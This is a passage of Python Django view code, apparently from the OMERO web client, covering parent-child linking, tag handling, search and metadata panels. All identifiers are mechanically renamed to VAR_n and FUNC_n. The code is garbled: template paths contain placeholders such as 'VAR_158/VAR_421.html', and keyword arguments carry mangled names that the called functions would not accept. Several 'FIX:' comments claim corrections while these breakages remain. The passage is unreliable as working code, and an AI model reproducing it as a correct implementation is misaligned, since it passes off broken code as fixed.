        VAR_17 = json.loads(VAR_2.body)
    except TypeError:
        # Python 2 compatibility: body may need native-str conversion.
        VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
    if VAR_2.method == "POST":
        return FUNC_25(VAR_6, VAR_17)
    elif VAR_2.method == "DELETE":
        return FUNC_26(VAR_6, VAR_17)
def FUNC_25(VAR_6, VAR_17, **VAR_7):
    """Create the parent-child links described by the JSON payload VAR_17.

    VAR_17 maps parent type -> {parent_id: {child_type: [child_ids]}}.
    All links are saved in one batch; if that fails they are retried
    one-by-one, silently skipping failures (e.g. duplicate links).
    Returns a JsonResponse with {"success": bool} (or an error dict).
    """
    VAR_78 = {"success": False}
    VAR_79 = []
    # Admins with WriteOwned may link on behalf of other users; in that
    # case the link is owned by the child object's owner, not the admin.
    VAR_80 = "WriteOwned" in VAR_6.getCurrentAdminPrivileges()
    VAR_66 = VAR_6.getUserId()
    for VAR_12, VAR_82 in VAR_17.items():
        if VAR_12 in ("orphaned", "experimenter"):
            continue
        for VAR_13, children in VAR_82.items():
            for VAR_14, VAR_15 in children.items():
                VAR_385 = FUNC_23(VAR_6, VAR_14, VAR_15)
                for VAR_16 in VAR_15:
                    VAR_13 = int(VAR_13)
                    VAR_346 = FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16)
                    if VAR_346 and VAR_346 != "orphan":
                        if VAR_80 and VAR_385[VAR_16] != VAR_66:
                            VAR_346.details.owner = ExperimenterI(
                                VAR_385[VAR_16], False
                            )
                        VAR_79.append(VAR_346)
    if len(VAR_79) > 0:
        # NOTE(review): VAR_12/VAR_13 here are the values left over from the
        # last loop iteration - the group lookup assumes a single-parent
        # payload. Looks intentional but verify against callers.
        VAR_255 = VAR_12.title()
        if VAR_255 in ["Tagset", "Tag"]:
            VAR_255 = "TagAnnotation"
        try:
            VAR_272 = VAR_6.getQueryService().get(VAR_255, VAR_13, VAR_6.SERVICE_OPTS)
            VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_272.details.group.id.val)
        except omero.ValidationException:
            return JsonResponse(
                {"error": "Object of type %s and ID %s not found" % (VAR_255, VAR_13)},
                # FIX: status kwarg was mangled to VAR_315 (TypeError).
                status=404,
            )
        VAR_0.info("api_link: Saving %s links" % len(VAR_79))
        try:
            VAR_6.saveArray(VAR_79)
            VAR_78["success"] = True
        except Exception:
            VAR_0.info(
                "api_link: Exception on saveArray with %s links" % len(VAR_79)
            )
            # Best-effort fallback: save links individually so valid ones
            # are not lost to a single bad entry.
            for VAR_346 in VAR_79:
                try:
                    VAR_6.saveObject(VAR_346)
                except Exception:
                    pass
            VAR_78["success"] = True
    return JsonResponse(VAR_78)
def FUNC_26(VAR_6, VAR_17):
    """Delete the parent-child links described by the JSON payload VAR_17.

    VAR_17 maps parent type -> {parent_id: {child_type: [child_ids]}}.
    After deleting, re-queries the remaining links so the response also
    lists any OTHER parents still linked to the same children.
    Returns a JsonResponse: {"success": True, <parent_type>: {...}}.
    """
    VAR_78 = {"success": False}
    for VAR_12, VAR_82 in VAR_17.items():
        # "orphaned" is a pseudo-container; there are no links to delete.
        if VAR_12 == "orphaned":
            continue
        for VAR_13, children in VAR_82.items():
            for VAR_14, VAR_15 in children.items():
                VAR_386 = FUNC_21(
                    VAR_6, VAR_12, VAR_13, VAR_14, VAR_15
                )
                if VAR_386 is None:
                    continue
                VAR_387, VAR_240 = VAR_386
                VAR_388 = [VAR_71.id.val for VAR_71 in VAR_240]
                VAR_0.info("api_link: Deleting %s links" % len(VAR_388))
                VAR_6.deleteObjects(VAR_387, VAR_388, wait=True)
                # Re-query with parent=None to find links from OTHER
                # parents to these children (skipping the one just removed).
                VAR_387, VAR_389 = FUNC_21(
                    VAR_6, VAR_12, None, VAR_14, VAR_15
                )
                for rl in VAR_389:
                    VAR_361 = rl.parent.id.val
                    VAR_422 = rl.child.id.val
                    if VAR_361 == int(VAR_13):
                        continue
                    if VAR_12 not in VAR_78:
                        VAR_78[VAR_12] = {}
                    if VAR_361 not in VAR_78[VAR_12]:
                        VAR_78[VAR_12][VAR_361] = {VAR_14: []}
                    VAR_78[VAR_12][VAR_361][VAR_14].append(VAR_422)
    VAR_78["success"] = True
    return JsonResponse(VAR_78)
@login_required()
def FUNC_27(VAR_2, VAR_6=None, **VAR_7):
    """Return JSON describing parent-child links for the requested child ids.

    Query params "image", "dataset" and "plate" each accept one or more
    (possibly comma-separated) id lists; for each, all links to their
    respective parent type are marshalled as {"id", "parent", "child"}.
    """
    child_to_parent = {"image": "dataset", "dataset": "project", "plate": "screen"}
    payload = []
    for child_type, parent_type in child_to_parent.items():
        raw_values = VAR_2.GET.getlist(child_type)
        if len(raw_values) == 0:
            continue
        # Each query-param value may itself be a comma-separated id list.
        child_ids = [
            token for value in raw_values for token in value.split(",")
        ]
        _, links = FUNC_21(
            VAR_6, parent_type, None, child_type, child_ids
        )
        for link in links:
            payload.append(
                {
                    "id": link.id.val,
                    "parent": {"type": parent_type, "id": link.parent.id.val},
                    "child": {"type": child_type, "id": link.child.id.val},
                }
            )
    return JsonResponse({"data": payload})
@login_required()
def FUNC_28(VAR_2, VAR_6=None, **VAR_7):
    """Return JSON "paths" from the hierarchy root down to the requested object.

    Reads ids for the various container types from the query string; if a
    tag or tagset id is given, paths are resolved through the tag hierarchy
    instead of the project/dataset/screen hierarchy.
    """
    try:
        VAR_11 = FUNC_0(VAR_2, "experimenter", None)
        VAR_245 = FUNC_0(VAR_2, "project", None)
        VAR_246 = FUNC_0(VAR_2, "dataset", None)
        VAR_256 = FUNC_0(VAR_2, "image", None)
        VAR_251 = FUNC_0(VAR_2, "screen", None)
        VAR_252 = FUNC_0(VAR_2, "plate", None)
        # "run" and "acquisition" are aliases; "acquisition" wins if both set.
        VAR_257 = FUNC_0(VAR_2, "run", None)
        VAR_257 = FUNC_0(VAR_2, "acquisition", VAR_257)
        VAR_258 = VAR_2.GET.get("well", None)
        VAR_259 = FUNC_0(VAR_2, "tag", None)
        VAR_260 = FUNC_0(VAR_2, "tagset", None)
        VAR_261 = FUNC_0(VAR_2, "roi", None)
        VAR_262 = FUNC_0(VAR_2, "shape", None)
        VAR_20 = FUNC_0(VAR_2, "group", None)
        VAR_263 = FUNC_0(VAR_2, "page_size", settings.PAGE)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if VAR_259 is not None or VAR_260 is not None:
        VAR_264 = paths_to_tag(VAR_6, VAR_11, VAR_260, VAR_259)
    else:
        VAR_264 = paths_to_object(
            VAR_6,
            VAR_11,
            VAR_245,
            VAR_246,
            VAR_256,
            VAR_251,
            VAR_252,
            VAR_257,
            VAR_258,
            VAR_20,
            VAR_263,
            VAR_261,
            VAR_262,
        )
    return JsonResponse({"paths": VAR_264})
@login_required()
def FUNC_29(VAR_2, VAR_6=None, **VAR_7):
    """Route tag requests: GET lists/loads tags, DELETE removes them."""
    dispatch = {"GET": FUNC_30, "DELETE": FUNC_31}
    handler = dispatch.get(VAR_2.method)
    if handler is not None:
        return handler(VAR_2, VAR_6, **VAR_7)
def FUNC_30(VAR_2, VAR_6=None, **VAR_7):
    """Marshal tags (or one tag's contents) as JSON for the tree view.

    With an "id" param, returns the objects tagged by that tag; otherwise
    returns the list of tags, optionally restricted to orphans.
    """
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_259 = FUNC_0(VAR_2, "id", None)
        VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
        VAR_247 = FUNC_3(VAR_2, "orphaned", False)
        VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
        VAR_250 = FUNC_3(VAR_2, "date", False)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        if VAR_259 is not None:
            # FIX: the kwarg values referenced undefined names (conn,
            # experimenter_id, ...) and raised NameError; pass the locals.
            VAR_265 = tree.marshal_tagged(
                VAR_6=VAR_6,
                VAR_11=VAR_11,
                VAR_259=VAR_259,
                VAR_20=VAR_20,
                VAR_87=VAR_87,
                VAR_248=VAR_248,
                VAR_250=VAR_250,
                VAR_88=VAR_88,
            )
        else:
            VAR_265 = {}
            VAR_265["tags"] = tree.marshal_tags(
                VAR_6=VAR_6,
                VAR_247=VAR_247,
                VAR_11=VAR_11,
                VAR_259=VAR_259,
                VAR_20=VAR_20,
                VAR_87=VAR_87,
                VAR_88=VAR_88,
            )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(VAR_265)
def FUNC_31(VAR_2, VAR_6=None, **VAR_7):
    """Delete the tag annotations whose ids are given in the request."""
    try:
        tag_ids = FUNC_2(VAR_2, "id")
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    handle = None
    try:
        # Bundle one Delete command per tag into a single DoAll request.
        batch = omero.cmd.DoAll()
        batch.requests = [
            omero.cmd.Delete("/Annotation", tag_id) for tag_id in tag_ids
        ]
        handle = VAR_6.c.sf.submit(batch, VAR_6.SERVICE_OPTS)
        try:
            VAR_6._waitOnCmd(handle)
        finally:
            handle.close()
    except CmdError as e:
        return HttpResponseBadRequest(e.message)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse("")
@login_required()
def FUNC_32(VAR_2, VAR_6=None, **VAR_7):
    """Marshal annotations for the selected objects as JSON.

    Reads id lists for each object type plus optional annotation type/ns
    filters from the query string and returns {"annotations", "experimenters"}.
    """
    VAR_71 = VAR_2.GET
    VAR_46 = FUNC_1(VAR_2, "image")
    VAR_45 = FUNC_1(VAR_2, "dataset")
    VAR_44 = FUNC_1(VAR_2, "project")
    VAR_47 = FUNC_1(VAR_2, "screen")
    VAR_48 = FUNC_1(VAR_2, "plate")
    VAR_85 = FUNC_1(VAR_2, "acquisition")
    VAR_86 = FUNC_1(VAR_2, "well")
    VAR_87 = FUNC_0(VAR_2, "page", 1)
    VAR_88 = FUNC_0(VAR_2, "limit", VAR_1)
    VAR_89 = VAR_71.get("type", None)
    VAR_90 = VAR_71.get("ns", None)
    # FIX: the kwarg values referenced undefined names (project_ids,
    # dataset_ids, ...) and raised NameError; pass the locals instead.
    VAR_91, VAR_92 = tree.marshal_annotations(
        VAR_6,
        VAR_44=VAR_44,
        VAR_45=VAR_45,
        VAR_46=VAR_46,
        VAR_47=VAR_47,
        VAR_48=VAR_48,
        VAR_85=VAR_85,
        VAR_86=VAR_86,
        VAR_89=VAR_89,
        VAR_90=VAR_90,
        VAR_87=VAR_87,
        VAR_88=VAR_88,
    )
    return JsonResponse({"annotations": VAR_91, "experimenters": VAR_92})
@login_required()
def FUNC_33(VAR_2, VAR_6=None, **VAR_7):
    """Marshal shares and discussions for a member/owner as JSON."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_244 = FUNC_0(VAR_2, "member_id", -1)
        VAR_231 = FUNC_0(VAR_2, "owner_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        # FIX: kwarg values referenced undefined names (conn, member_id,
        # owner_id, page, limit) - NameError; pass the locals.
        VAR_112 = tree.marshal_shares(
            VAR_6=VAR_6, VAR_244=VAR_244, VAR_231=VAR_231, VAR_87=VAR_87, VAR_88=VAR_88
        )
        # FIX: result was bound to an unrelated name ("discussions") while
        # the return statement read the never-assigned VAR_268.
        VAR_268 = tree.marshal_discussions(
            VAR_6=VAR_6, VAR_244=VAR_244, VAR_231=VAR_231, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"shares": VAR_112, "discussions": VAR_268})
@login_required()
@render_response()
def FUNC_34(VAR_2, VAR_18=None, VAR_19=None, VAR_6=None, **VAR_7):
    """Load the thumbnail grid for a container (plate/acquisition aware).

    VAR_18/VAR_19 name the container type and id; for plates/acquisitions a
    well-index form and "select_wells" (from the "show" param) are added to
    the context. Returns a template context dict for render_response.
    """
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_94 = dict()
    if VAR_18 is not None:
        if VAR_19 is not None and int(VAR_19) > 0:
            VAR_94[VAR_347(VAR_18)] = VAR_241(VAR_19)
    try:
        VAR_104 = BaseContainer(VAR_6, **VAR_94)
    except AttributeError as x:
        return handlerInternalError(VAR_2, x)
    VAR_95 = None
    VAR_53 = {"manager": VAR_104, "form_well_index": VAR_95, "index": VAR_93}
    VAR_54 = None
    if "plate" in VAR_94 or "acquisition" in VAR_94:
        VAR_269 = VAR_104.getNumberOfFields()
        if VAR_269 is not None:
            VAR_95 = WellIndexForm(VAR_115={"index": VAR_93, "range": VAR_269})
            if VAR_93 == 0:
                # Default to the first available field index.
                VAR_93 = VAR_269[0]
        # "show" may carry "well-<id>" tokens to pre-select wells.
        VAR_59 = VAR_2.GET.get("show")
        if VAR_59 is not None:
            VAR_348 = []
            for w in VAR_59.split("|"):
                if "well-" in w:
                    VAR_348.append(w.replace("well-", ""))
            VAR_53["select_wells"] = ",".join(VAR_348)
        VAR_53["baseurl"] = VAR_352("webgateway").rstrip("/")
        VAR_53["form_well_index"] = VAR_95
        VAR_53["index"] = VAR_93
        VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
        VAR_54 = "webclient/VAR_158/VAR_421.html"
    if VAR_18 == "acquisition":
        VAR_53["acquisition"] = VAR_19
    VAR_53["isLeader"] = VAR_6.isLeader()
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_35(VAR_2, VAR_6=None, **VAR_7):
    """Return the owners of the selected objects and the groups they share.

    Used to offer valid chgrp/chown targets: collects the owner ids and
    group ids of the requested objects, then intersects the owners' group
    memberships (dropping the system "user" group and, when all objects sit
    in a single group, that current group).
    Returns {"owners": [[id, name], ...], "groups": [...]}.
    """
    VAR_96 = []
    VAR_97 = set()
    VAR_98 = []
    VAR_68 = {}
    VAR_77 = {}
    for VAR_215 in ("Project", "Dataset", "Image", "Screen", "Plate"):
        VAR_154 = VAR_2.GET.get(VAR_215, None)
        if VAR_154 is not None:
            for o in VAR_6.getObjects(VAR_215, VAR_154.split(",")):
                VAR_96.append(o.getDetails().owner.id.val)
                VAR_97.add(o.getDetails().group.id.val)
    VAR_96 = list(set(VAR_96))
    if len(VAR_96) == 0:
        # No objects selected: fall back to the current user.
        VAR_96 = [VAR_6.getUserId()]
    for VAR_103 in VAR_6.getObjects(
        "Experimenter", VAR_96, opts={"load_experimentergroups": True}
    ):
        VAR_270 = []
        VAR_77[VAR_103.id] = VAR_103.getFullName()
        for VAR_101 in VAR_103.copyGroupExperimenterMap():
            VAR_68[VAR_101.parent.id.val] = VAR_101.parent
            VAR_270.append(VAR_101.parent.id.val)
        VAR_98.append(set(VAR_270))
    # Groups common to ALL owners.
    VAR_99 = set.intersection(*VAR_98)
    VAR_100 = VAR_6.getAdminService().getSecurityRoles().userGroupId
    if VAR_100 in VAR_99:
        # FIX: was targetGroupIds.remove(...) - an undefined name.
        VAR_99.remove(VAR_100)
    if len(VAR_97) == 1:
        VAR_271 = VAR_97.pop()
        if VAR_271 in VAR_99:
            # FIX: same undefined-name bug; drop the objects' current group.
            VAR_99.remove(VAR_271)

    def FUNC_84(VAR_101):
        # Summarise a group's permissions for the client.
        VAR_272 = VAR_101.getDetails().permissions
        return {
            "write": VAR_272.isGroupWrite(),
            "annotate": VAR_272.isGroupAnnotate(),
            "read": VAR_272.isGroupRead(),
        }

    VAR_102 = []
    for VAR_337 in VAR_99:
        VAR_102.append(
            {"id": VAR_337, "name": VAR_68[VAR_337].name.val, "perms": FUNC_84(VAR_68[VAR_337])}
        )
    # FIX: list.sort() takes key= - the kwarg name had been mangled.
    VAR_102.sort(key=lambda x: x["name"])
    VAR_77 = [[VAR_415, VAR_416] for VAR_415, VAR_416 in VAR_77.items()]
    return {"owners": VAR_77, "groups": VAR_102}
@login_required()
@render_response()
def FUNC_36(VAR_2, VAR_20, VAR_21, VAR_6=None, **VAR_7):
    """Render the container hierarchy used to pick a chgrp target."""
    VAR_6.SERVICE_OPTS.setOmeroGroup(int(VAR_20))
    owner_id = getIntOrDefault(VAR_2, "owner", None)
    manager = BaseContainer(VAR_6)
    manager.listContainerHierarchy(owner_id)
    return {
        "manager": manager,
        "target_type": VAR_21,
        "template": "webclient/VAR_158/chgrp_target_tree.html",
    }
@login_required()
@render_response()
def FUNC_37(VAR_2, VAR_22=None, VAR_6=None, **VAR_7):
    """Run a search (text or advanced) and build the results context.

    When the query is purely ids/commas/spaces, the ids are additionally
    looked up directly so exact-id matches appear even if not indexed.
    """
    VAR_104 = BaseSearch(VAR_6)
    VAR_105 = []
    VAR_71 = VAR_2.GET
    if VAR_22 is not None:
        VAR_273 = VAR_71.get("query", None)
        if VAR_273 is None:
            return HttpResponse("No search '?query' included")
        # FIX: was query_search.replace(...) - an undefined name.
        VAR_273 = VAR_273.replace("+", " ")
        VAR_274 = toBoolean(VAR_71.get("advanced"))
        if VAR_274:
            VAR_273 = VAR_71.get("advanced_search")
        VAR_54 = "webclient/search/search_details.html"
        VAR_275 = VAR_71.getlist("datatype")
        VAR_269 = VAR_71.getlist("field")
        VAR_276 = VAR_71.get("searchGroup", None)
        VAR_277 = VAR_71.get("ownedBy", None)
        VAR_278 = toBoolean(VAR_71.get("useAcquisitionDate"))
        VAR_279 = VAR_71.get("startdateinput", None)
        VAR_279 = VAR_279 is not None and smart_str(VAR_279) or None
        VAR_280 = VAR_71.get("enddateinput", None)
        VAR_280 = VAR_280 is not None and smart_str(VAR_280) or None
        VAR_250 = None
        if VAR_279 is not None:
            if VAR_280 is None:
                # Open-ended range: default the end date to today.
                VAR_390 = datetime.datetime.now()
                VAR_280 = "%s-%02d-%02d" % (VAR_390.year, VAR_390.month, VAR_390.day)
            VAR_250 = "%s_%s" % (VAR_279, VAR_280)
        if len(VAR_275) == 0:
            VAR_275 = ["images"]
        VAR_104.search(
            VAR_273,
            VAR_275,
            VAR_269,
            VAR_276,
            VAR_277,
            VAR_278,
            VAR_250,
            rawQuery=VAR_274,
        )
        # FIX: pattern had been mangled to r"^[\VAR_364 ,]+$" ("\V" is an
        # invalid regex escape); restore digits/space/comma class.
        VAR_281 = re.compile(r"^[\d ,]+$")
        if VAR_281.search(VAR_273) is not None:
            # Query looks like a list of ids - also try direct id lookup
            # across all groups.
            VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
            VAR_349 = set()
            for queryId in re.split(" |,", VAR_273):
                if len(queryId) == 0:
                    continue
                try:
                    VAR_423 = VAR_241(queryId)
                    if VAR_423 in VAR_349:
                        continue
                    VAR_349.add(VAR_423)
                    for VAR_433 in VAR_275:
                        VAR_433 = VAR_433[0:-1]  # remove 's'
                        if VAR_433 in (
                            "project",
                            "dataset",
                            "image",
                            "screen",
                            "plate",
                            "well",
                        ):
                            VAR_38 = VAR_6.getObject(VAR_433, VAR_423)
                            if VAR_38 is not None:
                                VAR_105.append({"otype": VAR_433, "obj": VAR_38})
                except ValueError:
                    pass
    else:
        VAR_54 = "webclient/search/search.html"
    VAR_53 = {
        "manager": VAR_104,
        "foundById": VAR_105,
        "resultCount": VAR_104.c_size + len(VAR_105),
    }
    VAR_53["template"] = VAR_54
    VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    return VAR_53
@login_required()
@render_response()
def FUNC_38(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
    """Load the general-metadata (right-hand panel) context for one object.

    VAR_23/VAR_24 name the object type and id; shares/discussions get the
    share template with a comment form, other types the general template.
    """
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_53 = dict()
    VAR_106 = VAR_23 == "image" and list(VAR_6.getObjects("Image", [VAR_24])) or list()
    VAR_107 = (
        VAR_23 == "dataset" and list(VAR_6.getObjects("Dataset", [VAR_24])) or list()
    )
    VAR_108 = (
        VAR_23 == "project" and list(VAR_6.getObjects("Project", [VAR_24])) or list()
    )
    VAR_109 = VAR_23 == "screen" and list(VAR_6.getObjects("Screen", [VAR_24])) or list()
    VAR_110 = VAR_23 == "plate" and list(VAR_6.getObjects("Plate", [VAR_24])) or list()
    VAR_111 = (
        VAR_23 == "acquisition"
        and list(VAR_6.getObjects("PlateAcquisition", [VAR_24]))
        or list()
    )
    VAR_112 = (
        (VAR_23 == "share" or VAR_23 == "discussion")
        and [VAR_6.getShare(VAR_24)]
        or list()
    )
    VAR_113 = VAR_23 == "well" and list(VAR_6.getObjects("Well", [VAR_24])) or list()
    VAR_114 = {
        "images": VAR_23 == "image" and [VAR_24] or [],
        "datasets": VAR_23 == "dataset" and [VAR_24] or [],
        "projects": VAR_23 == "project" and [VAR_24] or [],
        "screens": VAR_23 == "screen" and [VAR_24] or [],
        "plates": VAR_23 == "plate" and [VAR_24] or [],
        "acquisitions": VAR_23 == "acquisition" and [VAR_24] or [],
        "wells": VAR_23 == "well" and [VAR_24] or [],
        "shares": ((VAR_23 == "share" or VAR_23 == "discussion") and [VAR_24] or []),
    }
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_106,
        "datasets": VAR_107,
        "projects": VAR_108,
        "screens": VAR_109,
        "plates": VAR_110,
        "acquisitions": VAR_111,
        "wells": VAR_113,
        "shares": VAR_112,
    }
    VAR_116 = None
    VAR_117 = None
    if VAR_23 in ("share", "discussion"):
        VAR_54 = "webclient/annotations/annotations_share.html"
        VAR_104 = BaseShare(VAR_6, VAR_24)
        VAR_104.getAllUsers(VAR_24)
        VAR_104.getComments(VAR_24)
        # FIX: was VAR_115=initial - "initial" is undefined (NameError);
        # the form's initial data is the dict built above.
        VAR_116 = CommentAnnotationForm(VAR_115=VAR_115)
    else:
        try:
            VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24), "index": VAR_93})
        except AttributeError as x:
            return handlerInternalError(VAR_2, x)
        if VAR_25 is not None:
            VAR_54 = "webclient/annotations/annotations_share.html"
            VAR_53["share"] = BaseShare(VAR_6, VAR_25)
        else:
            VAR_54 = "webclient/annotations/metadata_general.html"
            VAR_53["canExportAsJpg"] = VAR_104.canExportAsJpg(VAR_2)
            VAR_53["annotationCounts"] = VAR_104.getAnnotationCounts()
            VAR_117 = VAR_104.listFigureScripts()
    VAR_53["manager"] = VAR_104
    if VAR_23 in ("tag", "tagset"):
        VAR_53["insight_ns"] = omero.rtypes.rstring(
            omero.constants.metadata.NSINSIGHTTAGSET
        ).val
    if VAR_116 is not None:
        VAR_53["form_comment"] = VAR_116
    VAR_53["figScripts"] = VAR_117
    VAR_53["template"] = VAR_54
    VAR_53["webclient_path"] = VAR_352("webindex")
    return VAR_53
@login_required()
@render_response()
def FUNC_39(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
    """Build the image-preview panel context, marshalling rendering defs.

    Keeps only the newest rendering def per owner and serialises each as a
    webgateway-style "c" string plus the greyscale/colour model flag.
    """
    VAR_53 = {}
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
    if VAR_25:
        VAR_53["share"] = BaseShare(VAR_6, VAR_25)
    if VAR_23 == "well":
        VAR_104.image = VAR_104.well.getImage(VAR_93)
    VAR_118 = VAR_104.image.getAllRenderingDefs()
    VAR_119 = {}
    VAR_120 = VAR_104.image.getRenderingDefId()
    for VAR_71 in VAR_118:
        VAR_229 = VAR_71["owner"]["id"]
        VAR_71["current"] = VAR_71["id"] == VAR_120
        # Keep only the highest-id (most recent) rdef per owner.
        if VAR_229 not in VAR_119 or VAR_119[VAR_229]["id"] < VAR_71["id"]:
            VAR_119[VAR_229] = VAR_71
    # FIX: was rdefs.values() - "rdefs" is undefined (NameError).
    VAR_119 = VAR_119.values()
    VAR_121 = []
    for VAR_71 in VAR_119:
        VAR_282 = []
        for VAR_320, VAR_383 in enumerate(VAR_71["c"]):
            VAR_350 = "-"
            if VAR_383["active"]:
                VAR_350 = ""
            VAR_351 = VAR_383["lut"] if "lut" in VAR_383 else VAR_383["color"]
            VAR_352 = "r" if VAR_383["inverted"] else "-r"
            VAR_282.append(
                "%s%s|%s:%s%s$%s" % (VAR_350, VAR_320 + 1, VAR_383["start"], VAR_383["end"], VAR_352, VAR_351)
            )
        VAR_121.append(
            {
                "id": VAR_71["id"],
                "owner": escape(VAR_71["owner"]),  # May be used unsafe later
                "c": ",".join(VAR_282),
                "m": VAR_71["model"] == "greyscale" and "g" or "c",
            }
        )
    VAR_122, VAR_123 = VAR_6.getMaxPlaneSize()
    VAR_124 = VAR_104.image.getSizeX()
    VAR_125 = VAR_104.image.getSizeY()
    VAR_53["tiledImage"] = (VAR_124 * VAR_125) > (VAR_122 * VAR_123)
    VAR_53["manager"] = VAR_104
    VAR_53["rdefsJson"] = json.dumps(VAR_121)
    VAR_53["rdefs"] = VAR_119
    VAR_53["template"] = "webclient/annotations/metadata_preview.html"
    return VAR_53
@login_required()
@render_response()
def FUNC_40(VAR_2, VAR_23, VAR_24, VAR_6=None, **VAR_7):
    """Render the hierarchy tab of the metadata panel for one object."""
    manager = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
    return {
        "manager": manager,
        "template": "webclient/annotations/metadata_hierarchy.html",
    }
@login_required()
@render_response()
def FUNC_41(
    VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7
):
    """Build the acquisition-metadata panel context for one object.

    For images, assembles per-channel forms (light path, detector and light
    source settings, plane timing info) and instrument-level forms
    (objectives, filters, dichroics, detectors, light sources). Shares and
    discussions get the share template instead.
    """
    try:
        if VAR_23 in ("share", "discussion"):
            VAR_54 = "webclient/annotations/annotations_share.html"
            VAR_104 = BaseShare(VAR_6, VAR_24)
            VAR_104.getAllUsers(VAR_24)
            VAR_104.getComments(VAR_24)
        else:
            VAR_54 = "webclient/annotations/metadata_acquisition.html"
            VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
    except AttributeError as x:
        return handlerInternalError(VAR_2, x)
    VAR_126 = None
    VAR_127 = None
    VAR_128 = None
    VAR_129 = list()
    VAR_130 = None
    VAR_131 = list()
    VAR_132 = list()
    VAR_133 = list()
    VAR_134 = list()
    VAR_135 = list()
    VAR_136 = list(VAR_6.getEnumerationEntries("LaserType"))
    VAR_137 = list(VAR_6.getEnumerationEntries("ArcType"))
    VAR_138 = list(VAR_6.getEnumerationEntries("FilamentType"))
    # Enumerations below are loaded lazily, only if any objective exists.
    VAR_139 = None
    VAR_140 = None
    VAR_141 = None
    if VAR_23 == "image":
        if VAR_25 is None:
            VAR_104.companionFiles()
        VAR_104.channelMetadata()
        for theC, ch in enumerate(VAR_104.channel_metadata):
            VAR_353 = ch.getLogicalChannel()
            if VAR_353 is not None:
                VAR_391 = dict()
                VAR_391["form"] = MetadataChannelForm(
                    VAR_115={
                        "logicalChannel": VAR_353,
                        "exWave": ch.getExcitationWave(units=True),
                        "emWave": ch.getEmissionWave(units=True),
                        "illuminations": list(
                            VAR_6.getEnumerationEntries("IlluminationI")
                        ),
                        "contrastMethods": list(
                            VAR_6.getEnumerationEntries("ContrastMethodI")
                        ),
                        "modes": list(VAR_6.getEnumerationEntries("AcquisitionModeI")),
                    },
                    auto_id=False,
                )
                if VAR_25 is None:
                    VAR_424 = VAR_353.getLightPath()
                    if VAR_424 is not None:
                        VAR_391["form_dichroic"] = None
                        VAR_391["form_excitation_filters"] = list()
                        VAR_391["form_emission_filters"] = list()
                        VAR_434 = VAR_424.getDichroic()
                        if VAR_434 is not None:
                            VAR_391["form_dichroic"] = MetadataDichroicForm(
                                VAR_115={"dichroic": VAR_434}
                            )
                        VAR_435 = list(VAR_6.getEnumerationEntries("FilterTypeI"))
                        for f in VAR_424.getEmissionFilters():
                            VAR_391["form_emission_filters"].append(
                                MetadataFilterForm(
                                    VAR_115={"filter": f, "types": VAR_435}
                                )
                            )
                        for f in VAR_424.getExcitationFilters():
                            VAR_391["form_excitation_filters"].append(
                                MetadataFilterForm(
                                    VAR_115={"filter": f, "types": VAR_435}
                                )
                            )
                    VAR_425 = VAR_353.getDetectorSettings()
                    if (
                        VAR_425._obj is not None
                        and VAR_425.getDetector()
                    ):
                        VAR_391["form_detector_settings"] = MetadataDetectorForm(
                            VAR_115={
                                "detectorSettings": VAR_425,
                                "detector": VAR_425.getDetector(),
                                "types": list(
                                    VAR_6.getEnumerationEntries("DetectorTypeI")
                                ),
                                "binnings": list(VAR_6.getEnumerationEntries("Binning")),
                            }
                        )
                    VAR_426 = VAR_353.getLightSourceSettings()
                    if (
                        VAR_426 is not None
                        and VAR_426._obj is not None
                    ):
                        VAR_436 = VAR_426.getLightSource()
                        if VAR_436 is not None:
                            # Pick the type enumeration matching the source.
                            VAR_439 = VAR_136
                            if VAR_436.OMERO_CLASS == "Arc":
                                VAR_439 = VAR_137
                            elif VAR_436.OMERO_CLASS == "Filament":
                                VAR_439 = VAR_138
                            VAR_391["form_light_source"] = MetadataLightSourceForm(
                                VAR_115={
                                    "lightSource": VAR_436,
                                    "lightSourceSettings": VAR_426,
                                    "lstypes": VAR_439,
                                    "mediums": list(
                                        VAR_6.getEnumerationEntries("LaserMediumI")
                                    ),
                                    "pulses": list(
                                        VAR_6.getEnumerationEntries("PulseI")
                                    ),
                                }
